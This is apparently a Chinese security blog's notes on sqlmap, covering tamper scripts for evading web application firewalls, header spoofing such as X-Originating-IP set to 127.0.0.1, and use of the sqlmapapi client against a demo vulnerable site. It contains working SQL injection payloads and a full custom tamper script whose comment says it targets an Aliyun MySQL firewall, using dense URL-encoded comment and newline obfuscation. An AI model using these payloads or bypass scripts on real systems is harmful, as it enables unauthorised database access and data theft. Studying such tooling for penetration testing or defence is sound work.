附加一个HTTP头来 X-originating-IP = "127.0.0.1" 来绕过防火墙
Reference:
Examples:
>> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
>> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
>> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
>> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
>> X-remote-IP: * or %00 or %0A
versionedkeywords.py
Encloses each non-function keyword with (MySQL) versioned comment
Requirement:
- MySQL
Tested against:
- MySQL 4.0.18, 5.1.56, 5.5.11
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
versionedmorekeywords.py
Encloses each keyword with (MySQL) versioned comment
Requirement:
- MySQL >= 5.1.13
Tested against:
- MySQL 5.1.56, 5.5.11
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
xforwardedfor.py
Append a fake HTTP header 'X-Forwarded-For' (and alike)
附加多个虚假的 HTTP 头
headers["X-Forwarded-For"] = randomIP()
headers["X-Client-Ip"] = randomIP()
headers["X-Real-Ip"] = randomIP()
headers["CF-Connecting-IP"] = randomIP()
headers["True-Client-IP"] = randomIP()
headers["Via"] = "1.1 Chrome-Compression-Proxy"
headers["CF-IPCountry"] = random.sample(('GB', 'US', 'FR', 'AU', 'CA', 'NZ', 'BE', 'DK', 'FI', 'IE', 'AT', 'IT', 'LU', 'NL', 'NO', 'PT', 'SE', 'ES', 'CH'), 1)[0]
bypass
#!/usr/bin/env python2
#user by: XG
import re
from lib.core.data import kb
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
retVal = payload
if payload:
# ALiYun mysql
# index.php?id=336699dfg
retVal = re.sub(r" ", "%20", retVal)
retVal = re.sub(r"\'\)%20AND%20", "%27%29%2f%2a%20%30%30%7d%7d%29%5d%5b%2a%2f%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
retVal = re.sub(r"\)%20AND%20", "%29%2f%2a%30%30%7d%7d%29%5d%5b%2a%2f%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
retVal = re.sub(r"\'%20AND%20", "%27%20%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
retVal = re.sub(r"%20AND%20", "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
retVal = re.sub(r"%20OR%20NOT%20", "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aOR%20NOT%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
retVal = re.sub(r"%20OR%20", "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aOR%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
retVal = re.sub(r"=", "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aLIKE%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
retVal = re.sub(r"\'%20UNION", "%27%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aUNION", retVal)
retVal = re.sub(r"UNION%20SELECT%20", "UNION%0d%0a%20%2d%2d%20%81/*%99%20%0d%0a%0d%0a%0d%0aSELECT%0d%0a%20%2d%2d%20%81/*%99%0d%0a%0d%0a", retVal)
retVal = re.sub(r"UNION%20ALL%20SELECT%20", "UNION%0d%0a%20%2d%2d%20%81/*%99%20%0d%0a%0d%0a%0d%0aALL%20SELECT%0d%0a%20%2d%2d%20%81/*%99%0d%0a%0d%0a", retVal)
retVal = re.sub(r"%20FROM", "%0d%0a%20%2d%2d%20%87%0d%0aFROM", retVal)
retVal = re.sub(r"FROM%20INFORMATION_SCHEMA\.", "FROM%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aINFORMATION_SCHEMA%0d%0a.", retVal)
retVal = re.sub(r"CASE%20", "CASE%0D%0A%0d%2d%2d%20%99%29%20%0d%0a", retVal)
retVal = re.sub(r"THEN%20", "THEN%0D%0A%0d%2d%2d%20%99%29%20%0d%0a", retVal)
retVal = re.sub(r"ELT\(", "ELT%20%2d%2d%20%29%29%29%29%29%29%0d%0a%28", retVal)
#retVal = re.sub(r"\(SELECT%20", "%28%20%2d%2d%0d%99%20%0d%0aSELECT%0D%0A%0d%2d%2d%20%99%29%20%0d%0a", retVal)
#retVal = re.sub(r"\(SELECT%20", "%28%20%2d%2d%0d%99%5b%5d%20%0d%0aSELECT%0D%0A%0d%2d%2d%20%99%29%20%0d%0a", retVal)
retVal = re.sub(r"\(SELECT%20", "%28%20%20%23%20%2f%2a%99%29%5d%5b%7b%7d%23%5b%5d%0aSELECT%20", retVal)
retVal = re.sub(r"SELECT%20\(", "SELECT%20%2d%2d%20%29%29%29%5b%5d%7b%7d%0d%0a%28", retVal)
retVal = re.sub(r"CONCAT\(", "CONCAT%20%23%20%89%0d%0a%28", retVal)
retVal = re.sub(r"CHR\(", "CHR%20%2d%2d%20%29%29%29%29%5b%5d%7b%7d%0d%0a%28", retVal)
retVal = re.sub(r"CHAR\(", "CHAR%20%2d%2d%20%29%29%29%29%5b%5d%7b%7d%0d%0a%28", retVal)
retVal = re.sub(r"EXTRACTVALUE\(", "EXTRACTVALUE%20%23%20%89%0d%0a%28", retVal)
#retVal = re.sub(r"%20INFORMATION_SCHEMA", "%20/*like%22%0d%0a%20%2d%2d%20%0d%22*/%20%0d%0a%20INFORMATION_SCHEMA%0d%0a", retVal)
return retVal
ACCESS
相关文章
API接口
相关文章
使用方式
python3 sqlmapapi.py -s -H 0.0.0.0 # 开启服务端,监听本地 8775 端口
开启服务端后我们可以访问 url 进行调用,也可以在命令行进行调用
python3 sqlmapapi.py -c # 默认连接本机的 api
没有问题就可以进入我们的命令行了
命令行下可以使用以下命令
help 显示帮助信息
new ARGS 开启一个新的扫描任务 (e.g. 'new -u "http://testphp.vulnweb.com/artists.php?artist=1"')
use TASKID 切换taskid (e.g. 'use c04d8c5c7582efb4')
data 获取当前任务返回的数据
log 获取当前任务的扫描日志
status 获取当前任务的扫描状态
option OPTION 获取当前任务的选项
options 获取当前任务的所有配置信息
stop 停止当前任务
kill 杀死当前任务
list 显示所有任务列表
version 查看版本信息
flush 清空所有任务
exit 退出客户端
开始扫描新的任务
new -u 'http://testphp.vulnweb.com/artists.php?artist=1'
可以看到已经切换到我们这个任务的 ID.
每一个任务只能是一个单独测试点,每个任务对应一个 ID
创建成功后就会这样,之后我们可以通过输入 status 来获取当前的一个运行情况
status
SQLMAP API 扫描完成后,不会进行主动推送完成信息
returncode 如果返回的是 0,那么我们的注入就是成功的。我们可以输入 data 来获取我们的详细的信息。
data
返回的数据都是 JSON 格式的数据
点击关注,共同学习!
安全狗的自我修养
